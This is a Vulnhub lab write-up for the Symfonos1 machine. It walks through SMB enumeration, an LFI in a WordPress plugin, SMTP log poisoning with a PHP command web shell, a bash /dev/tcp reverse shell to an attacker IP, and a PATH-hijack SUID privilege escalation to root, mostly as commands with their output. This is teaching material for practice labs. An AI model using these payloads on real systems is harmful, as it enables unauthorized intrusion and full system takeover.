Vulnhub - Symfonos1

Hi all, Let’s start this awesome series!

You can find the machine there > Symfonos1

Enumeration/Reconnaissance

Let’s start always with nmap.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

$ ip=192.168.1.12 $ nmap -p- --min-rate 10000 $ip Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-15 22:14 EEST Nmap scan report for symfonos.local (192.168.1.12) Host is up (0.000075s latency). Not shown: 65530 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:7E:E4:6F (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds $ nmap -p 22,25,80,139,445 -sC -sV -oN nmap/initial $ip Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-15 22:15 EEST Nmap scan report for symfonos.local (192.168.1.12) Host is up (0.00032s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA) | 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA) |_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=symfonos | Subject Alternative Name: DNS:symfonos | Not valid before: 2019-06-29T00:29:42 |_Not valid after: 2029-06-26T00:29:42 |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) MAC Address: 00:0C:29:7E:E4:6F (VMware)

Lot of things to enumerate, but first let’s add the symfonos.local to our hosts file as the box description says.

192.168.1.12 symfonos.local

Let’s start with SMB, let’s list the shares. I’ll show you 2 ways to do that:

1 2 3 4 5 6 7 8

$ smbmap -H $ip [+] Guest session IP: 192.168.1.12:445 Name: symfonos.local Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers helios NO ACCESS Helios personal share anonymous READ ONLY IPC$ NO ACCESS IPC Service (Samba 4.5.16-Debian)

1 2 3 4 5 6 7 8 9

$ smbclient -L //$ip Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers helios Disk Helios personal share anonymous Disk IPC$ IPC IPC Service (Samba 4.5.16-Debian)

Let’s connect to anonymous share since we have READ ONLY permission.

Great, we have 3 possible passwords -> epidioko:qwerty:baseball. We can see a helios share, that’s a username. After some tries i found the right password:

1 2 3

$ echo qwerty | smbclient //$ip/helios -U helios Enter WORKGROUP\helios's password: Try "help" to get a list of possible commands.

Let’s connect to it and download the files.

todo.txt has an interesting directory:

1 2 3 4 5

$ cat todo.txt 1. Binge watch Dexter 2. Dance 3. Work on /h3l105

It’s a wordpress site:

SMTP log poisoning - shell as helios

Let’s run wpscan on it.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

$ wpscan --no-banner --url http://symfonos.local/h3l105/ -e ap [+] URL: http://symfonos.local/h3l105/ [192.168.1.12] [+] Started: Wed Jul 15 22:53:20 2020 Interesting Finding(s): ..junk data.. [i] Plugin(s) Identified: [+] mail-masta | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/ | Latest Version: 1.0 (up to date) | Last Updated: 2014-09-19T07:52:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | Version: 1.0 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

mail-masta plugin seems interesting. Let’s search for possible exploits.

1 2 3 4 5 6 7

$ searchsploit mail masta ------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt WordPress Plugin Mail Masta 1.0 - SQL Injection | php/webapps/41438.txt ------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Let’s check the LFI one & we have LFI:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

$ curl "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false Debian-exim:x:105:109::/var/spool/exim4:/bin/false messagebus:x:106:111::/var/run/dbus:/bin/false sshd:x:107:65534::/run/sshd:/usr/sbin/nologin helios:x:1000:1000:,,,:/home/helios:/bin/bash mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false postfix:x:109:115::/var/spool/postfix:/bin/false

Now we need to find a way to get shell, i stuck here for a bit. But then i noticed that SMTP is open.

SMTP(Simple Mail Transfer Protocol) server send & receive emails.

We can do SMTP log poisoning, we will send an email to user helios with our payload:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

$ telnet $ip 25 Trying 192.168.1.12... Connected to 192.168.1.12. Escape character is '^]'. 220 symfonos.localdomain ESMTP Postfix (Debian/GNU) HELO pwned.pwn 250 symfonos.localdomain MAIL FROM: atom@pwned.com 250 2.1.0 Ok RCPT TO: helios 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> Subject: <?php echo system($_GET["cmd"]); ?> Hello! :) . 250 2.0.0 Ok: queued as EF2F340698 quit 221 2.0.0 Bye Connection closed by foreign host.

Now the local mailbox is under /var/mail/$USER and we have RCE:

1 2 3

$ curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls+-la" | tail -3 -rwxr-xr-x 1 helios helios 23492 Jun 28 2019 view-campaign.php -rwxr-xr-x 1 helios helios 23492 Jun 28 2019 view-campaign.phpHello!:)

Let’s spawn a shell now. I’ll show you a good trick to url encode/decode from terminal:

$ apt-get install gridsite-clients

1 2	$ urlencode "bash -c 'bash -i >& /dev/tcp/192.168.1.16/5555 0>&1'" bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.16%2F5555%200%3E%261%27

1	$ curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.16%2F5555%200%3E%261%27"

We have shell:

1 2 3

$ nc -lvp 5555 <h3l105/wp-content/plugins/mail-masta/inc/campaign$ python3 -c 'import pty; pty.spawn("/bin/bash")' <h3l105/wp-content/plugins/mail-masta/inc/campaign$

helios -> root

Privesc is simple, let’s check for SUIDs.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

helios@symfonos:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null find / -uid 0 -perm -4000 -type f 2>/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/passwd /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /opt/statuscheck /bin/mount /bin/umount /bin/su /bin/ping

/opt/statuscheck seems interesting, if we run strings on it we can see that execute curl:

1 2 3 4 5 6 7 8 9 10 11 12 13 14

helios@symfonos:/$ strings /opt/statuscheck strings /opt/statuscheck /lib64/ld-linux-x86-64.so.2 libc.so.6 system __cxa_finalize __libc_start_main _ITM_deregisterTMCloneTable __gmon_start__ _Jv_RegisterClasses _ITM_registerTMCloneTable GLIBC_2.2.5 curl -I H <---- http://lH

We can exploit this, by making the binary to execute our curl. We will modify the PATH environmental variable, first let’s make the file:

1 2 3 4

helios@symfonos:/$ cd /tmp helios@symfonos:/tmp$ touch curl helios@symfonos:/tmp$ chmod +x curl helios@symfonos:/tmp$ echo "bash -p" > curl

You may notice the -p argument, this allows the shell to run with SUID privileges.

Now let’s modify the PATH & run the binary.

1 2 3 4

helios@symfonos:/tmp$ export PATH=/tmp:$PATH helios@symfonos:/tmp$ /opt/statuscheck bash-4.4# whoami root

That was an awesome box! :D